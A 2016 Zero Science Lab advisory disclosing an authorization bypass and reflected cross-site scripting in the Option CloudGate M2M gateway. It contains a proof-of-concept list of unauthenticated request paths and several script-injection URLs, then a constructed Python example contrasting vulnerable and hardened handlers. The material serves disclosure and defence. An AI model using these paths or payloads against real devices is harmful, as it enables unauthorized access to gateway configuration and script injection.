Option CloudGate Insecure Direct Object References Authorization Bypass

2016-06-25T00:00:00
ID ZSL-2016-5333
Type zeroscience
Reporter Gjoko Krstic
Modified 2016-06-25T00:00:00

Description

Title: Option CloudGate Insecure Direct Object References Authorization Bypass
Advisory ID: ZSL-2016-5333
Type: Local/Remote
Impact: Security Bypass, Cross-Site Scripting
Risk: (3/5)
Release Date: 25.06.2016

Summary

The CloudGate M2M gateway from Option provides competitively priced LAN to WWAN routing and GPS functionality in a single basic unit certified on all major US cellular operators (CDMA/EV-DO and WCDMA/HSPA+). The CloudGate is simple to configure locally or remotely from your PC, tablet or Smartphone.

Description

Insecure Direct Object References occur when an application provides direct access to objects based on user-supplied input. As a result of this vulnerability attackers can bypass authorization and access resources and functionalities in the system directly, for example APIs, files, upload utilities, device settings, etc.

Vendor

Option NV - <http://www.option.com>

Affected Version

CG0192-11897

Tested On

lighttpd 1.4.39
firmware 2.62.4

Vendor Status

[11.06.2016] Vulnerability discovered.
[12.06.2016] Contact with the vendor.
[24.06.2016] No response from the vendor.
[25.06.2016] Public security advisory released.

PoC

cloudgate_mv.txt

Credits

Vulnerability discovered by Gjoko Krstic - <gjoko@zeroscience.mk>

References

[1] <https://www.exploit-db.com/exploits/40016/>
[2] <https://cxsecurity.com/issue/WLB-2016060197>
[3] <https://packetstormsecurity.com/files/137654>
[4] <https://exchange.xforce.ibmcloud.com/vulnerabilities/114490>
[5] <https://exchange.xforce.ibmcloud.com/vulnerabilities/114491>

Changelog

[25.06.2016] - Initial release
[28.06.2016] - Added references [1], [2], [3], [4] and [5]

Contact

Zero Science Lab

Web: <http://www.zeroscience.mk>
e-mail: lab@zeroscience.mk

Option CloudGate Insecure Direct Object References Authorization Bypass


Vendor: Option NV
Product web page: http://www.option.com
Affected version: CG0192-11897

Summary: The CloudGate M2M gateway from Option provides competitively
priced LAN to WWAN routing and GPS functionality in a single basic unit
certified on all major US cellular operators (CDMA/EV-DO and WCDMA/HSPA+).
The CloudGate is simple to configure locally or remotely from your PC,
tablet or Smartphone.

Desc: Insecure Direct Object References occur when an application provides
direct access to objects based on user-supplied input. As a result of this
vulnerability attackers can bypass authorization and access resources and
functionalities in the system directly, for example APIs, files, upload
utilities, device settings, etc.

Tested on: lighttpd 1.4.39
           firmware 2.62.4


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience


Advisory ID: ZSL-2016-5333
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5333.php


11.06.2016

--


GET /partials/firewall.html
GET /partials/system.html
GET /partials/ipsec.html
GET /partials/provisioning.html
GET /api/login
GET /api/replacementui
GET /api/goatgates

OR

/#/firewall
/#/system
/#/ipsec
/#/provisioning


XSS:

http://127.0.0.2/api/replacementui<script>alert(1)</script>
http://127.0.0.2/api/goatgates<script>alert(2)</script>
http://127.0.0.2/api/Blah-Blah<script>alert(3)</script>
http://127.0.0.2/api/<script>alert(4)</script>
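
A defensive illustration of the two issues listed above, added here and not taken from the advisory or from CloudGate firmware: a constructed Python model that contrasts a handler leaving authorization to the client-side UI and echoing the request path with one that enforces a server-side session check and encodes reflected input. The handler names, session store, page content and the assumption that the error response echoes the path are all hypothetical.

```python
# Added illustration: a constructed model of the flaw class, not CloudGate firmware code.
import html

PROTECTED_PREFIXES = ("/partials/", "/api/")   # route families named in the advisory
KNOWN = {"/partials/firewall.html": "<h1>Firewall settings</h1>"}  # constructed content
SESSIONS = {"s3ss10n-admin"}                    # constructed server-side session store


def vulnerable(path, session_id=None):
    """Assumed weak pattern: only the client-side UI checks login state."""
    if path in KNOWN:
        return 200, KNOWN[path]                 # served to anyone who asks
    return 404, "Unknown resource: " + path     # path echoed without encoding


def hardened(path, session_id=None):
    """Default-deny on the server, plus output encoding of reflected input."""
    if path.startswith(PROTECTED_PREFIXES) and session_id not in SESSIONS:
        return 401, "Authentication required"   # checked before any lookup or echo
    if path in KNOWN:
        return 200, KNOWN[path]
    return 404, "Unknown resource: " + html.escape(path)


def audit(handler, session_id=None):
    """Return the findings a reviewer would flag for the given handler."""
    probe = "/api/unknown<b>x</b>"              # harmless markup marker, constructed
    findings = []
    anonymous = session_id not in SESSIONS
    if anonymous and handler("/partials/firewall.html", session_id)[0] == 200:
        findings.append("partial served without a session")
    if "<b>" in handler(probe, session_id)[1]:
        findings.append("request path reflected unencoded")
    return findings


if __name__ == "__main__":
    for name, h in (("vulnerable", vulnerable), ("hardened", hardened)):
        print(name, "anonymous:", audit(h), "| logged in:", audit(h, "s3ss10n-admin"))
```

Which routes must stay reachable before login is device-specific and is not modelled here; the point is that the session check runs on the server for every protected route, before any lookup or echo of the path.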